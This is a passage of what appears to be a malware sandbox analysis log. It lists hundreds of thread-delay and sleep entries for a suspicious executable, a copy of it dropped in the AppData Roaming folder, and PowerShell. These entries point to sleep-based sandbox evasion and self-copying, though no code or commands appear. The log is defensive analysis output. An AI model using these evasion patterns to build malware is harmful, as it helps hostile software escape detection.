                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398671
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398562
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398451
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398343
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398234
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398125
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397955
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397750
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397637
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397529
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397389
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397281
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397171
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2397059
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396953
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396843
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396734
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396625
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396515
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396406
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396296
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396187
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2396078
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395968
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395859
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395750
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395640
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395531
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395421
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395282
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395164
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2395052
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394937
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394828
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394718
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394607
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394500
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394390
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2394281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399874
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399766
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399547
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399437
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399219
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398911
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398754
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398641
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398406
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398187
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398077
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397969
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397859
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397750
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397637
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397531
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397416
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397312
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397203
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397093
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396766
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396547
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396437
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396218
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396109
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395891
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395781
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395672
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395557
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395453
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395343
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395234
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395125
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395016
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394906
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394797
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394683
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394574
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394468
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394359
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394245
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399546
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399403
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399185
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2399077
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398969
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398859
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398750
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398640
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398530
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398312
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398201
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2398093
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397547
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397435
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397218
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397104
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2397000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396845
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396481
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396258
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2396047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2395047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Thread delayed: delay time: 2394391
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6314
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3398
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Window / User API: threadDelayed 3470
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Window / User API: threadDelayed 6380
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 3249
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 6607
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 4657
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Window / User API: threadDelayed 5193
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 3948 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep count: 38 > 30
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -35048813740048126s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 3176 Thread sleep count: 3470 > 30
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399875s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 3176 Thread sleep count: 6380 > 30
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399765s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399654s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399546s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399431s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399327s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399216s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399109s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2399000s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398890s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398780s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398671s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398562s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398451s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398343s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398234s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2398125s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397955s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397750s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397637s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397529s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397389s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397281s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397171s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2397059s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396953s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396843s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396734s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396625s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396515s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396406s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396296s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396187s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2396078s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395968s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395859s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395750s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395640s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395531s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395421s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395282s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395164s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2395052s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394937s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394828s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394718s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394607s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394500s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394390s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe TID: 940 Thread sleep time: -2394281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5500 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep count: 38 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -35048813740048126s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6772 Thread sleep count: 3249 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6772 Thread sleep count: 6607 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2399219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398911s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398754s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398641s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398296s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2398077s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397637s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397416s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2397093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2396000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395557s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2395016s >= -30000s
